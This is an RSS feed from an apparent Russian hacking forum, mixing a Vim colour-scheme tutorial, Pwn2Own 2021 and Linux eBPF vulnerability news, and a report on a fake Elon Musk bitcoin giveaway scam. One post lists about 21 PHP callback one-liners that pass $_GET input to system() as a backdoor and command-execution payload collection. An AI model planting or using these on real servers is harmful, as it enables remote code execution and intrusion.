						&lt;p&gt;hi Normal&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; ctermfg=253&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;ctermbg=234&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;cterm=None&lt;br /&gt;hi Cursor&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;ctermfg=253&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;ctermbg=57&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; cterm=None&lt;br /&gt;hi SpecialKey&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; ctermfg=70&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; ctermbg=None&amp;#160; &amp;#160; &amp;#160; &amp;#160; cterm=None&lt;br /&gt;hi Directory&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; ctermfg=57&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; ctermbg=254&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;cterm=None&lt;br /&gt;hi ErrorMsg&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;ctermfg=160&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;ctermbg=245&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;cterm=None&lt;br /&gt;hi PreProc&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; ctermfg=243&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;ctermbg=None&amp;#160; &amp;#160; &amp;#160; &amp;#160; cterm=Bold&lt;br /&gt;hi Search&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; ctermfg=234&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;ctermbg=3&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;cterm=Bold&lt;br /&gt;hi Type&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; ctermfg=166&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;ctermbg=None&amp;#160; &amp;#160; &amp;#160; &amp;#160; cterm=Bold&lt;br /&gt;hi Statement&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; ctermfg=172&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;ctermbg=None&amp;#160; &amp;#160; &amp;#160; &amp;#160; cterm=Bold&lt;br /&gt;hi Comment&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; ctermfg=240&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;ctermbg=None&amp;#160; &amp;#160; &amp;#160; &amp;#160; cterm=None&lt;br /&gt;hi LineNr&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; ctermfg=244&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;ctermbg=233&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;cterm=None&lt;br /&gt;hi NonText&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; ctermfg=105&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;ctermbg=None&amp;#160; &amp;#160; &amp;#160; &amp;#160; cterm=Bold&lt;br /&gt;hi DiffText&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; ctermfg=165&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;ctermbg=244&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;cterm=None&lt;br /&gt;hi Constant&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; ctermfg=76&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; ctermbg=None&amp;#160; &amp;#160; &amp;#160; &amp;#160; cterm=None&lt;br /&gt;hi Todo&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;ctermfg=162&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;ctermbg=None&amp;#160; &amp;#160; &amp;#160; &amp;#160; cterm=Bold&lt;br /&gt;hi Identifier&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; ctermfg=142&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;ctermbg=None&amp;#160; &amp;#160; &amp;#160; &amp;#160; cterm=Bold&lt;br /&gt;hi Error&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; ctermfg=None&amp;#160; &amp;#160; &amp;#160; &amp;#160; ctermbg=196&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;cterm=Bold&lt;br /&gt;hi Special&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; ctermfg=172&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;ctermbg=None&amp;#160; &amp;#160; &amp;#160; &amp;#160; cterm=Bold&lt;br /&gt;hi Ignore&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;ctermfg=221&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;ctermbg=None&amp;#160; &amp;#160; &amp;#160; &amp;#160; cterm=Bold&lt;br /&gt;hi Underline&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; ctermfg=147&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;ctermbg=None&amp;#160; &amp;#160; &amp;#160; &amp;#160; cterm=Italic&lt;/p&gt;
						&lt;p&gt;hi FoldColumn&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; ctermfg=132&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;ctermbg=None&amp;#160; &amp;#160; &amp;#160; &amp;#160; cterm=None&lt;br /&gt;hi Folded&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;ctermfg=132&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;ctermbg=None&amp;#160; &amp;#160; &amp;#160; &amp;#160; cterm=Bold&lt;/p&gt;
						&lt;p&gt;hi Visual&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;ctermfg=248&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;ctermbg=238&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;cterm=None&lt;br /&gt;а потом - мутить уже свои настройки.&lt;/p&gt;
						&lt;p&gt;В формате ничего страшного нет, пишем hi НазваниеЭлемента и далее цвета ctermfg, ctermbg, cterm... с этим проблем быть не должно.&lt;/p&gt;
						&lt;p&gt;Вопрос: где взять название элемента и как это вообще делается.&lt;/p&gt;
						&lt;p&gt;В конфиг vimrc добавляем такой скрипт:&lt;/p&gt;
						&lt;p&gt;Code:&lt;/p&gt;
						&lt;p&gt;&amp;quot; Просмотр цветовой группы текущего элемента текста. Удалить, когда не будет надобности&lt;br /&gt;map &amp;lt;F4&amp;gt; :call &amp;lt;SID&amp;gt;SynStack()&amp;lt;CR&amp;gt;&lt;br /&gt;function! &amp;lt;SID&amp;gt;SynStack()&lt;br /&gt;&amp;#160; if !exists(&amp;quot;*synstack&amp;quot;)&lt;br /&gt;&amp;#160; &amp;#160; return&lt;br /&gt;&amp;#160; endif&lt;br /&gt;&amp;#160; execute &#039;syntax on&#039;&lt;br /&gt;&amp;#160; redraw&lt;br /&gt;&amp;#160; echo map(synstack(line(&#039;.&#039;), col(&#039;.&#039;)), &#039;synIDattr(v:val, &amp;quot;name&amp;quot;)&#039;)&lt;br /&gt;endfunc&lt;br /&gt;Скрипт публичный, я его только модифицировал чтобы он обновлял по F4 текущую схему и можно было видеть сразу же произведенные настройки. Это можно сделать и автоматом - но мне лишний раз надавить F4 не сложно, поэтому я не запаривался.&lt;/p&gt;
						&lt;p&gt;Итого открываем две консоли с vim. Одну с новенькой цветовой схемой - вторую с кодом на c++ например. В окне с кодом перемещаем курсор к слову int, например, и нажимаем F4 (есессно ничто не мешает назначить сею функцию на другую кнопку). В зависимости от настроек vim где-то должна вылезти подсказка &amp;quot;cType&amp;quot;. Что мы делаем ? Переключаемся на окно с конфигом цветовой схемы - и там пишем&lt;/p&gt;
						&lt;p&gt;Code:&lt;/p&gt;
						&lt;p&gt;hi cType&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;ctermfg=red&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;ctermbg=green&amp;#160; &amp;#160; &amp;#160; &amp;#160;cterm=Underline&lt;br /&gt;Сохраняем, переключаемся обратно на окно с кодом и нажимаем F4.&lt;/p&gt;
						&lt;p&gt;Получаем некое вырвиглазное зрелище.&lt;/p&gt;
						&lt;p&gt;VIM в качестве IDE, изображение №2&lt;br /&gt;Вырвиглазное оно потому что нормальный человек вместо red и green напишет тот цветовой код, который ему больше нравится. А ненормальный... ему и так хорошо&lt;/p&gt;
						&lt;p&gt;В результате за часик можно намутить себе вполне приличную и приятную на глаз тему оформления.&lt;/p&gt;
						&lt;p&gt;Теперь к тому, почему при переключении этих тем могут происходить чудеса. А дело все в том что VIM при переключении этих тем не отменяет настройки, которые были сделаны предыдущей темой. И если в старой схеме есть подсветка int а в новой нет - то переключившись на новую - мы будем все еще иметь подсветку, которая была в старой. Эта проблема примитивно решается каким-то глобальным списком всех сделанных цветовых настроек, которые будут сбрасываться в дефолт. Можно сделать и похитрее - но на начальном этапе вроде-как это не требуется. Тем более ничто не мешает (кроме чувства эстетики и стремления к прекрасному) сделать таким образом одну тему на все случаи жизни.&lt;/p&gt;
						&lt;p&gt;=============================&lt;/p&gt;
						&lt;p&gt;Пока как-то так.&lt;/p&gt;
						&lt;p&gt;:)&lt;br /&gt;:)&lt;/p&gt;</description>
			<author>mybb@mybb.ru (ФБР)</author>
			<pubDate>Mon, 12 Apr 2021 06:52:58 +0300</pubDate>
			<guid>https://hacknet.6bb.ru/viewtopic.php?pid=73#p73</guid>
		</item>
		<item>
			<title>Функции обратного вызова</title>
			<link>https://hacknet.6bb.ru/viewtopic.php?pid=72#p72</link>
			<description>&lt;p&gt;Функции обратного вызова&lt;br /&gt;Салом КулХацкер!&lt;/p&gt;
						&lt;p&gt;актуальные в php7.3, вызывать будем system(&amp;quot;id&amp;quot;);&lt;/p&gt;
						&lt;p&gt;Функции обратного вызова, изображение №1&lt;br /&gt;array_map&lt;br /&gt;Code:&lt;/p&gt;
						&lt;p&gt;array_map($_GET[x],$_GET);&lt;br /&gt;?x=system&amp;amp;_=id&lt;br /&gt;2. array_walk, array_filter, array_walk_recursive&lt;/p&gt;
						&lt;p&gt;Code:&lt;/p&gt;
						&lt;p&gt;array_walk($_GET,$_GET[x]);&lt;br /&gt;?x=system&amp;amp;_=id&lt;br /&gt;3. array_udiff&lt;/p&gt;
						&lt;p&gt;Code:&lt;/p&gt;
						&lt;p&gt;array_udiff($_GET,$_GET,$_GET[x]);&lt;br /&gt;?x=system&amp;amp;_=id&amp;amp;1&lt;br /&gt;4. array_reduce&lt;/p&gt;
						&lt;p&gt;Code:&lt;/p&gt;
						&lt;p&gt;array_reduce([1],$_GET[x],$_GET[_]);&lt;br /&gt;?x=system&amp;amp;_=id&lt;br /&gt;5. array_udiff_assoc, array_uintersect, array_uintersect_assoc&lt;/p&gt;
						&lt;p&gt;Code:&lt;/p&gt;
						&lt;p&gt;array_udiff_assoc($_GET,$_GET,$_GET[x]);&lt;br /&gt;?x=system&amp;amp;_=id&lt;br /&gt;6. array_intersect_uassoc, array_diff_ukey, array_diff_uassoc&lt;/p&gt;
						&lt;p&gt;Code:&lt;/p&gt;
						&lt;p&gt;array_intersect_uassoc($_GET,$_GET,$_GET[x]);&lt;br /&gt;?x=system&amp;amp;id=1&lt;br /&gt;7. array_uintersect_uassoc, array_udiff_uassoc&lt;/p&gt;
						&lt;p&gt;Code:&lt;/p&gt;
						&lt;p&gt;array_uintersect_uassoc($_GET, $_GET, $_GET[x],_);&lt;br /&gt;?x=system&amp;amp;_=id&lt;br /&gt;8. usort, uasort, ArrayObject::uasort&lt;/p&gt;
						&lt;p&gt;Code:&lt;/p&gt;
						&lt;p&gt;usort($_GET,$_GET[x]);&lt;br /&gt;?x=system&amp;amp;_=id&amp;amp;1&lt;br /&gt;9. uksort, ArrayObject::uksort&lt;/p&gt;
						&lt;p&gt;Code:&lt;/p&gt;
						&lt;p&gt;uksort($_GET,$_GET[x]);&lt;br /&gt;?x=system&amp;amp;id=1&amp;amp;1&lt;br /&gt;10. call_user_func&lt;/p&gt;
						&lt;p&gt;Code:&lt;/p&gt;
						&lt;p&gt;call_user_func($_GET[x], $_GET[_]);&lt;br /&gt;?x=system&amp;amp;_=id&lt;br /&gt;11. call_user_func_array&lt;/p&gt;
						&lt;p&gt;Code:&lt;/p&gt;
						&lt;p&gt;call_user_func_array($_GET[x], $_GET);&lt;br /&gt;?_=id&amp;amp;x=system&lt;br /&gt;12. iterator_apply&lt;/p&gt;
						&lt;p&gt;Code:&lt;/p&gt;
						&lt;p&gt;iterator_apply(new ArrayObject([1]),$_GET[w],$_GET);&lt;br /&gt;?_=id&amp;amp;w=system&lt;br /&gt;13. register_tick_function&lt;/p&gt;
						&lt;p&gt;Code:&lt;/p&gt;
						&lt;p&gt;declare(ticks=1);&lt;br /&gt;register_tick_function($_GET[x],$_GET[_]);&lt;br /&gt;?x=system&amp;amp;_=id&lt;br /&gt;14. forward_static_call&lt;/p&gt;
						&lt;p&gt;Code:&lt;/p&gt;
						&lt;p&gt;class A&lt;br /&gt;{&lt;br /&gt;&amp;#160; &amp;#160; function __construct() {&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; forward_static_call($_GET[x],$_GET[_]);&lt;br /&gt;&amp;#160; &amp;#160; }&lt;br /&gt;}&lt;br /&gt;new A;&lt;br /&gt;?x=system&amp;amp;_=id&lt;br /&gt;15 forward_static_call_array&lt;/p&gt;
						&lt;p&gt;Code:&lt;/p&gt;
						&lt;p&gt;class A&lt;br /&gt;{&lt;br /&gt;&amp;#160; &amp;#160; function __construct() {&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; forward_static_call_array($_GET[x],$_GET);&lt;br /&gt;&amp;#160; &amp;#160; }&lt;br /&gt;}&lt;br /&gt;new A;&lt;br /&gt;?_=id&amp;amp;x=system&lt;br /&gt;16. session_set_save_handler&lt;/p&gt;
						&lt;p&gt;Code:&lt;/p&gt;
						&lt;p&gt;session_set_save_handler($_GET[x],_,_,_,_,_);&lt;br /&gt;ini_set(&#039;session.save_path&#039;,$_GET[_]);&lt;br /&gt;session_start();&lt;br /&gt;?x=system&amp;amp;_=id&lt;br /&gt;17. sqlite::createFunction&lt;/p&gt;
						&lt;p&gt;Code:&lt;/p&gt;
						&lt;p&gt;$x=$_GET[x];&lt;br /&gt;$db = new SQLite3(&#039;:memory:&#039;);&lt;br /&gt;$db-&amp;gt;createFunction($x,$x);&lt;br /&gt;$db-&amp;gt;querySingle(&amp;quot;select $x(&#039;$_GET[_]&#039;)&amp;quot;);&lt;br /&gt;?x=system&amp;amp;_=id&lt;br /&gt;18. spl_autoload_register&lt;/p&gt;
						&lt;p&gt;Code:&lt;/p&gt;
						&lt;p&gt;spl_autoload_register($_GET[x]);&lt;br /&gt;new $_GET[_];&lt;br /&gt;?x=system&amp;amp;_=id&lt;br /&gt;19. ob_start&lt;/p&gt;
						&lt;p&gt;Code:&lt;/p&gt;
						&lt;p&gt;ob_start($_GET[x]);&lt;br /&gt;echo $_GET[_];&lt;br /&gt;?&amp;gt;&lt;br /&gt;?x=system&amp;amp;_=id&lt;br /&gt;20. set_exception_handler&lt;/p&gt;
						&lt;p&gt;Code:&lt;/p&gt;
						&lt;p&gt;set_exception_handler($_GET[x]);&lt;br /&gt;throw new Exception(&amp;quot;;$_GET[_];#&amp;quot;);&lt;br /&gt;?_=id&amp;amp;x=system&lt;br /&gt;21. register_shutdown_function&lt;/p&gt;
						&lt;p&gt;Code:&lt;/p&gt;
						&lt;p&gt;register_shutdown_function($_GET[x],$_GET[_]);&lt;br /&gt;?x=system&amp;amp;_=id&lt;/p&gt;</description>
			<author>mybb@mybb.ru (ФБР)</author>
			<pubDate>Mon, 12 Apr 2021 06:52:18 +0300</pubDate>
			<guid>https://hacknet.6bb.ru/viewtopic.php?pid=72#p72</guid>
		</item>
		<item>
			<title>На соревновании Pwn2Own 2021 совершены взломы Ubuntu, Chrome, Safari,</title>
			<link>https://hacknet.6bb.ru/viewtopic.php?pid=71#p71</link>
			<description>&lt;p&gt;Подведены итоги трёх дней соревнований Pwn2Own 2021, ежегодно проводимых в рамках конференции CanSecWest. Как и в прошлом году соревнования проводились виртуально и атаки демонстрировались online. Из 23 намеченных целей рабочие техники эксплуатации ранее неизвестных уязвимостей были продемонстрированы для Ubuntu Desktop, Windows 10, Сhrome, Safari, Parallels Desktop, Microsoft Exchange, Microsoft Teams и Zoom. Во всех случаях тестировались самые свежие версии программ, включающие все доступные обновления. Суммарный размер выплат составил один миллион двести тысяч долларов США (общий призовой фонд насчитывал полтора миллиона долларов).&lt;/p&gt;
						&lt;p&gt;На соревнованиях были предприняты три попытки эксплуатации уязвимостей в Ubuntu Desktop. Первая и вторая попытки были засчитаны и атакующим удалось продемонстрировать локальное повышение привилегий через эксплуатацию ранее неизвестных уязвимостей, связанных с переполнением буфера и двойном освобождении памяти (в каких именно компонентах проблемы пока не сообщается, до раскрытия данных разработчикам даётся 90 дней на исправление ошибок). За данные уязвимости выплачены премии в 30 тыс. долларов.&lt;/p&gt;
						&lt;p&gt;Третья попытка, предпринятая другой командой в категории локальное превышение привилегий, удалась лишь частично - эксплоит сработал и дал возможность получить доступ root, но атака была зачтена не полностью, так как связанная с уязвимостью ошибка уже была известна разработчикам Ubuntu и обновление с исправлением находилось на стадии подготовки.&lt;/p&gt;
						&lt;p&gt;Успешная атака также была продемонстрирована для браузеров на основе движка Chromium - Google Chrome и Microsoft Edge. За создание эксплоита, позволяющего выполнить свой код при открытии специально оформленной страницы в Chrome и Edge (был создан один универсальный эксплоит для двух браузеров), была выплачена премия в 100 тысяч долларов. Исправление планируется опубликовать в ближайшие часы, пока известно лишь то, что уязвимость присутствует в процессе, отвечающем за обработку web-контента (renderer).&lt;/p&gt;
						&lt;p&gt;Другие успешные атаки:&lt;/p&gt;
						&lt;p&gt;200 тысяч долларов за взлом приложения Zoom (удалось выполнить свой код, отправив сообщение другому пользователю, без необходимости совершения со стороны получателя каких-либо действий). Для атаки использовались три уязвимости в Zoom и одна в операционной системе Windows.&lt;br /&gt;200 тысяч долларов за взлом Microsoft Exchange (обход аутентификации и локальное повышение привилегий на сервере для получения прав администратора). Другой командной был продемонстрирован ещё один успешно работающий эксплоит, но вторая премия не была выплачена, так как те же ошибки уже были использованы первой командой.&lt;br /&gt;200 тысяч долларов за взлом Microsoft Teams (выполнение кода на сервере).&lt;br /&gt;100 тысяч долларов за эксплуатацию Apple Safari (целочисленное переполнение в Safari и переполнение буфера в ядре macOS для обхода sandbox и выполнении кода на уровне ядра).&lt;br /&gt;140 тысяч долларов за взлом Parallels Desktop (выход из виртуальной машины и выполнение кода в основной системе). Атака совершена через эксплуатацию трёх разных уязвимостей - утечки неинициализированной памяти, переполнения стека и целочисленного переполнения.&lt;br /&gt;Две премии по 40 тысяч долларов за взломы Parallels Desktop (логическая ошибка и переполнение буфера, позволившие выполнить код во внешней ОС через действия внутри виртуальной машины).&lt;br /&gt;Три премии по 40 тысяч долларов за три успешных эксплуатации Windows 10 (целочисленное переполнение, обращение к уже освобождённой памяти и состояние гонки, позволившие добиться получения привилегий SYSTEM).&lt;br /&gt;Предприняты, но не увенчались успехом, попытки взлома Oracle VirtualBox. Номинации за взлом Firefox, VMware ESXi, Hyper-V client, MS Office 365, MS SharePoint, MS RDP и Adobe Reader осталась невостребованными. Также не нашлось желающих продемонтрировать взлом информационной системы автомобиля Tesla, несмотря на приз в 600 тысяч долларов плюс автомобиль Tesla Model 3.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (ФБР)</author>
			<pubDate>Sun, 11 Apr 2021 11:17:43 +0300</pubDate>
			<guid>https://hacknet.6bb.ru/viewtopic.php?pid=71#p71</guid>
		</item>
		<item>
			<title>Уязвимости в подсистеме eBPF ядра Linux</title>
			<link>https://hacknet.6bb.ru/viewtopic.php?pid=70#p70</link>
			<description>&lt;p&gt;В подсистеме eBPF, позволяющей запускать обработчики для трассировки, анализа работы подсистем и управления трафиком, выполняемые внутри ядра Linux в специальной виртуальной машине с JIT, выявлена уязвимость (CVE-2021-29154), позволяющая локальному пользователю добиться выполнения свого кода на уровне ядра. Проблема проявляется вплоть до выпуска 5.11.12 (включительно) и ещё не исправлена в дистрибутивах (Debian, Ubuntu, RHEL, Fedora, SUSE, Arch). Исправление доступно в виде патча.&lt;/p&gt;
						&lt;p&gt;По заявлению исследователей, выявивших уязвимость, им удалось разработать рабочий прототип эксплоита для 32- и 64-разрядных систем x86, который может быть использован непривилегированным пользователем. При этом компания Red Hat отмечает, что опасность проблемы зависит от доступности пользователю системного вызова eBPF. Например, в RHEL и большинстве других дистрибутивов Linux в конфигурации по умолчанию уязвимость может быть эксплуатирована при включении BPF JIT и наличии у пользователя прав CAP_SYS_ADMIN. В качестве обходной меры защиты рекомендуется отключить BPF JIT при помощи команды:&lt;/p&gt;
						&lt;p&gt;echo 0 &amp;gt; /proc/sys/net/core/bpf_jit_enable&lt;/p&gt;
						&lt;p&gt;Проблема вызвана ошибкой вычисления смещения для команд ветвления в процессе генерации машинного кода JIT-компилятором. В частности, при генерации инструкций ветвления не учитывается, что смещение может измениться после прохождения стадии оптимизации. Указанная недоработка может использоваться для формирования аномального машинного кода и его выполнения их на уровне ядре.&lt;/p&gt;
						&lt;p&gt;Примечательно, что это не единственная уязвимость в подсистеме еBPF за последнее время. В конце марта в ядре были выявлены ещё две уязвимости (CVE-2020-27170, CVE-2020-27171), предоставляющие возможность использовать еBPF для обхода защиты от уязвимостей класса Spectre, позволяющих определять содержимое памяти ядра в результате создания условий для спекулятивного выполнения определённых операций. Для атаки Spectre требуется наличие в привилегированном коде определённой последовательности команд, приводящих к спекулятивному выполнению инструкций. В еBPF найдено несколько способов генерации подобных инструкций через манипуляции с передаваемыми для выполнения BPF-програмами.&lt;/p&gt;
						&lt;p&gt;Уязвимость CVE-2020-27170 вызвана наличием в верификаторе BPF манипуляций с указателями, вызывающими спекулятивные операции обращения к области вне границ буфера. Уязвимость CVE-2020-27171 связана с ошибкой целочисленной арифметики (integer underflow) при работе с указателями, приводящей к спекулятивному обращению к данным вне буфера. Указанные проблемы уже устранены в выпусках ядра 5.11.8, 5.10.25, 5.4.107, 4.19.182 и 4.14.227, а также вошли в состав обновлений ядра большинства дистрибутивов Linux. Исследователями подготовлен протитип эксплоита, позволяющий непривилегированному пользователю извлечь данные из памяти ядра.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (ФБР)</author>
			<pubDate>Sun, 11 Apr 2021 11:15:36 +0300</pubDate>
			<guid>https://hacknet.6bb.ru/viewtopic.php?pid=70#p70</guid>
		</item>
		<item>
			<title>Почему цена биткойнов продолжает расти?</title>
			<link>https://hacknet.6bb.ru/viewtopic.php?pid=69#p69</link>
			<description>&lt;p&gt;По состоянию на 16 декабря биткойн вырос примерно на 195% с начала года, превысив 23000 долларов, но что движет этим стремительным ростом? Причины его высокой оценки разнятся, но Биткойн вырос из того, что многие когда-то считали мошенничеством, в нечто, что превратилось в жизнеспособные инвестиции, сделанные известными инвесторами-миллиардерами, крупными организациями и розничными инвесторами. Почему эти инвесторы так оптимистично настроены по отношению к Биткойну даже после того, как он превысил исторические максимумы?&lt;/p&gt;</description>
			<author>mybb@mybb.ru (ФБР)</author>
			<pubDate>Mon, 05 Apr 2021 07:10:58 +0300</pubDate>
			<guid>https://hacknet.6bb.ru/viewtopic.php?pid=69#p69</guid>
		</item>
		<item>
			<title>Биткойн: фальшивая афера с раздачей Илона Маска обошлась человеку ?</title>
			<link>https://hacknet.6bb.ru/viewtopic.php?pid=68#p68</link>
			<description>&lt;p&gt;Себастьян всегда будет помнить момент, когда он потерял 407 000 фунтов стерлингов, с равной долей гнева и стыда.&lt;/p&gt;
						&lt;p&gt;В остальном ночь, предшествовавшая этому, была незабываемой.&lt;/p&gt;
						&lt;p&gt;Он и его жена посмотрели сериал на Netflix, прежде чем она легла спать и оставила его на диване возиться с телефоном.&lt;/p&gt;
						&lt;p&gt;Затем он получил уведомление в Twitter с новостями от Илона Маска.&lt;/p&gt;
						&lt;p&gt;Себастьян сказал Би-би-си: «Маск написал в Твиттере:« Dojo 4 Doge? » и мне стало интересно, что это значит.&lt;/p&gt;
						&lt;p&gt;«Ниже была ссылка на новое мероприятие, поэтому я щелкнул по ней и увидел, что он раздает биткойны!»&lt;/p&gt;
						&lt;p&gt;Себастьян перешел по ссылке на профессионально выглядящий веб-сайт, где раздача биткойнов, похоже, была в самом разгаре.&lt;/p&gt;
						&lt;p&gt;Был таймер обратного отсчета, и сайт обещал участникам, что они могут удвоить свои деньги.&lt;/p&gt;
						&lt;p&gt;Соревнование, по-видимому, проводилось командой Tesla Илона Маска. Он предлагал людям отправлять что-либо от 0,1 биткойна (стоимостью примерно 4300 фунтов стерлингов) до 20 биткойнов (примерно 860 000 фунтов стерлингов), и команда отправляла обратно вдвое большую сумму.&lt;/p&gt;
						&lt;p&gt;&#039;Возьми максимум&#039;&lt;br /&gt;Себастьян дважды проверил логотип проверки рядом с именем Илона Маска, а затем попытался решить, отправлять ли ему пять или 10 биткойнов.&lt;/p&gt;
						&lt;p&gt;«« Возьми максимум », - подумал я, это определенно реально, поэтому я отправил 10 биткойнов».&lt;/p&gt;
						&lt;p&gt;Следующие 20 минут, пока таймер закончился, Себастьян ждал, пока приз попадет в его биткойн-кошелек.&lt;/p&gt;
						&lt;p&gt;Из своего дома в Кельне в Германии он сидел и обновлял экран каждые 30 секунд.&lt;/p&gt;
						&lt;p&gt;Он увидел, как мистер Маск отправил новый загадочный твит, и был уверен, что раздача была реальной.&lt;/p&gt;
						&lt;p&gt;Но постепенно таймер на сайте опустился до нуля, и Себастьян сказал: «Тогда я понял, что это большая подделка.&lt;/p&gt;
						&lt;p&gt;«Я упал головой на подушки дивана, и мое сердце так сильно билось. Я думал, что просто выбросил все, что изменило мою семью, свой фонд досрочного выхода на пенсию и все предстоящие каникулы с моими детьми.&lt;/p&gt;
						&lt;p&gt;«Я поднялся наверх и сел на край кровати, чтобы рассказать жене. Я разбудил ее и сказал, что совершил большую ошибку, действительно большую ошибку».&lt;/p&gt;
						&lt;p&gt;Себастьян, который спросил, что Би-би-си не использует его настоящее имя, не спал в ту ночь.&lt;/p&gt;
						&lt;p&gt;Вместо этого он часами отправлял электронное письмо на сайт мошенников и твитнул фальшивую учетную запись Илона Маска в Твиттере, пытаясь вернуть часть или все свои деньги.&lt;/p&gt;
						&lt;p&gt;Однако в конце концов он начал соглашаться, что деньги ушли навсегда.&lt;/p&gt;
						&lt;p&gt;На расстоянии 133 миль в Амстердаме аналитики Whale Alert с ужасом наблюдали, как 10 биткойнов Себастьяна были переведены, а затем анонимно обналичены несколько дней спустя.&lt;/p&gt;
						&lt;p&gt;Компания по анализу блокчейнов в течение нескольких месяцев пыталась заставить власти принять меры против мошенничества, но заявляет, что ничего не предпринимается.&lt;/p&gt;
						&lt;p&gt;Аналитики используют публичный реестр, который показывает все движение криптовалют в режиме реального времени, чтобы отслеживать тенденции и отслеживать деньги.&lt;/p&gt;
						&lt;p&gt;Они определили, какими биткойн-адресами или кошельками управляют так называемые «мошенники с раздачей подарков», и отследили растущие суммы денег, которые они зарабатывают. 10 биткойнов Себастьяна были самой большой потерей за одну транзакцию, которую они когда-либо регистрировали.&lt;/p&gt;
						&lt;p&gt;Рекордные суммы кражи&lt;br /&gt;Исследователи говорят, что мошенники зарабатывают рекордные суммы в 2021 году. Раздаваемые банды уже заработали более 18 миллионов долларов (13 миллионов фунтов стерлингов) за первые три месяца этого года по сравнению с 16 миллионами долларов, заработанными в общей сложности за весь 2020 год.&lt;/p&gt;
						&lt;p&gt;Данные также свидетельствуют о том, что количество жертв в этом году будет больше, чем в предыдущие годы. В 2020 году около 10500 человек попались на мошенничество, но уже в этом году исследователи говорят, что они отследили 5600 отправителей денег.&lt;br /&gt;Основатель Whale Alert Франк ван Вирт говорит, что трудно сказать, почему мошенничество не только преобладает, но и становится все более успешным.&lt;/p&gt;
						&lt;p&gt;Фактические методы преступников не сильно изменились с момента появления мошенничества в 2018 году. Они создают аккаунты в Твиттере, похожие на аккаунты таких знаменитостей, как Илон Маск или инвестор-миллиардер Чамат Палихапития.&lt;/p&gt;
						&lt;p&gt;В некоторых случаях, как в случае с Себастьяном, преступники используют украденные учетные записи известных людей, чтобы убедиться, что у них есть синяя галочка «подтверждено», чтобы счет выглядел более надежным.&lt;/p&gt;
